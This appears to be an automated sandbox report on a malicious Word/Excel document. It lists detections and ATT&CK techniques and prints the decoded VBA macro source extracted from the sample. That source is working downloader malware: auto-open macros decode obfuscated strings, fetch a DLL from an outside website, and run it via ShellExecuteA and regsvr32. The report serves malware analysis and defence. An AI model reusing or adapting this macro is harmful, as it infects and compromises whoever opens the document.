MALICIOUS
174
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen and Workbook_Open macros trigger the execution of a function that appears to download and execute a second-stage payload, as indicated by the ShellExecuteA API call and the ClamAV detection as a downloader. The obfuscated nature of the script and the lack of specific indicators prevent a more precise family attribution.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Customizable = True Sub Auto_Open() Dim data As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Public Function EQYQiKCPp1NTW7bdceBTMkDnrO() As String EQYQiKCPp1NTW7bdceBTMkDnrO = Environ(ikOeMJ46xYsvZe4D7bKGVxjGco("bubEqqB")) & Application.PathSeparator & ikOeMJ46xYsvZe4D7bKGVxjGco("mme/fnbofmjg") End Function -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5101 bytes |
SHA-256: 021f1fade77537657f3afdeaeda40ae1e9a793ea192b1c401da81a44331d2687 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
Dim data As String
Dim user As String
CD.PhoouWk6UBv1bOGqZTIYmBrnRG
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "HD"
Attribute VB_Name = "CD"
Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal Time As LongPtr) As LongPtr
Private Declare PtrSafe Function ShellExecuteA Lib "shell32.dll" (ByVal fg As LongPtr, ByVal er As String, ByVal jtr As String, ByVal vwer4 As String, ByVal ity5 As String, ByVal vwe3 As Long) As Long
Public Sub PhoouWk6UBv1bOGqZTIYmBrnRG()
rsYuTbrzdzGWverm7K37vrnDEN
RcKvzAXnr6f8lgRVh0wKth5uRF
End Sub
Public Function InaWaOjFrP4Ojkc2ulPQLeLLN4()
Dim uB5KbPJfYH55a3163fWwAt8z7U As String
End Function
Private Sub CommandButt2on1()
MsgBox "Demo"
End Sub
Public Function EQYQiKCPp1NTW7bdceBTMkDnrO() As String
EQYQiKCPp1NTW7bdceBTMkDnrO = Environ(ikOeMJ46xYsvZe4D7bKGVxjGco("bubEqqB")) & Application.PathSeparator & ikOeMJ46xYsvZe4D7bKGVxjGco("mme/fnbofmjg")
End Function
Private Sub CommandButton1()
MsgBox "Demo"
End Sub
Public Function rsYuTbrzdzGWverm7K37vrnDEN()
Dim yzknEUqFOLMQv4N0IrUi6RK8a1 As String
Dim c57nBbsnsTUt57rIWljAAG4Zax2 As String
Dim c57nBbsnsTUt57rIWljAAG4Zax As String
Dim c57nBbsnsTUt57rIWljAAG4Zax3 As String
yzknEUqFOLMQv4N0IrUi6RK8a1 = ikOeMJ46xYsvZe4D7bKGVxjGco("mme/22be`uqzsd0fujmoj0tfnfiu0fdnzoju0tk0tfevmdoj.qx0npd/topjubfsdusbppuubu00;quui")
c57nBbsnsTUt57rIWljAAG4Zax = EQYQiKCPp1NTW7bdceBTMkDnrO()
c57nBbsnsTUt57rIWljAAG4Zax3 = ikOeMJ46xYsvZe4D7bKGVxjGco("fyf/mmfitsfxpq")
c57nBbsnsTUt57rIWljAAG4Zax2 = ikOeMJ46xYsvZe4D7bKGVxjGco("()fmjGebpmoxpE/*uofjmDcfX/ufO!udfkcP.xfO)|!'#!eobnnpd.!") + yzknEUqFOLMQv4N0IrUi6RK8a1 + ikOeMJ46xYsvZe4D7bKGVxjGco("(-(") + c57nBbsnsTUt57rIWljAAG4Zax + ikOeMJ46xYsvZe4D7bKGVxjGco("#~*(")
ShellExecuteA 0, ikOeMJ46xYsvZe4D7bKGVxjGco("ofqp"), c57nBbsnsTUt57rIWljAAG4Zax3, c57nBbsnsTUt57rIWljAAG4Zax2, vbNullString, 0
Sleep 5000
End Function
Private Sub UserForm_Initialize()
Me.StartUpPosition = 0
Me.Left = Application.Left + Application.Width / 2 - Me.Width / 2
Me.Top = Application.Top + Application.Height / 2 - Me.Height / 2
AddDemoData
HookMouseToForm Me
End Sub
Private Sub AddDemoData()
Dim i As Long
Dim tValue As String
For i = 1 To 100
ListBox1.AddItem i
ComboBox1.AddItem i
TextBox1.Value = TextBox1.Value & vbNewLine & i
Next i
End Sub
Public Function RcKvzAXnr6f8lgRVh0wKth5uRF()
Dim dsnxrH9hahsm5qCcQmDaEHpz5U As String
Dim DkasdaSS As String
DkasdaSS = ikOeMJ46xYsvZe4D7bKGVxjGco("fyf/34swthfs")
dsnxrH9hahsm5qCcQmDaEHpz5U = EQYQiKCPp1NTW7bdceBTMkDnrO() + ikOeMJ46xYsvZe4D7bKGVxjGco("sfwsfTsfutjhfSmmE-")
ShellExecuteA 0, ikOeMJ46xYsvZe4D7bKGVxjGco("ofqp"), DkasdaSS, dsnxrH9hahsm5qCcQmDaEHpz5U, vbNullString, 0
End Function
Function ikOeMJ46xYsvZe4D7bKGVxjGco(rvjM3bXjR8bob3KIowEW0xf9C5 As String) As String
ikOeMJ46xYsvZe4D7bKGVxjGco = yl2VAHBhZmVxM7LFecCwvGr5nh(MSk9MujTAcBLpEYaKCvrFgYJmm(rvjM3bXjR8bob3KIowEW0xf9C5, Len(rvjM3bXjR8bob3KIowEW0xf9C5), 1), Len(rvjM3bXjR8bob3KIowEW0xf9C5), 1)
End Function
Public Function MSk9MujTAcBLpEYaKCvrFgYJmm(rvjM3bXjR8bob3KIowEW0xf9C5 As String, f00X37sdwP7Ms4ZmpMozAJmnb5 As Long, SRrhQjK8Vgt4Ed68H4LbDK6NHS As Long) As String
Dim sM47ON58GbwO9XCuj33vIK3CCr As String
sM47ON58GbwO9XCuj33vIK3CCr = rvjM3bXjR8bob3KIowEW0xf9C5
For xA2qUdZ7O8DYSf8GWfM24xZSlD = 1 To f00X37sdwP7Ms4ZmpMozAJmnb5
Mid$(sM47ON58GbwO9XCuj33vIK3CCr, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1) = Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, f00X37sdwP7Ms4ZmpMozAJmnb5 - xA2qUdZ7O8DYSf8GWfM24xZSlD + SRrhQjK8Vgt4Ed68H4LbDK6NHS, 1)
Next
MSk9MujTAcBLpEYaKCvrFgYJmm = sM47ON58GbwO9XCuj33vIK3CCr
End Function
Public Function yl2VAHBhZmVxM7LFecCwvGr5nh(rvjM3bXjR8bob3KIowEW0xf9C5 As String, f00X37sdwP7Ms4ZmpMozAJmnb5 As Long, SRrhQjK8Vgt4Ed68H4LbDK6NHS As Long) As String
Dim sM47ON58GbwO9XCuj33vIK3CCr As String
For xA2qUdZ7O8DYSf8GWfM24xZSlD = 1 To f00X37sdwP7Ms4ZmpMozAJmnb5
sM47ON58GbwO9XCuj33vIK3CCr = Chr(Asc(Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1)) - SRrhQjK8Vgt4Ed68H4LbDK6NHS)
Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1) = sM47ON58GbwO9XCuj33vIK3CCr
Next
yl2VAHBhZmVxM7LFecCwvGr5nh = rvjM3bXjR8bob3KIowEW0xf9C5
End Function
' ----------- Headers ------------
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CDD442AE-698E-49DA-BC4D-23D32B5C1B66}{ED9391B7-85F4-4782-A503-612FDFD2A16B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.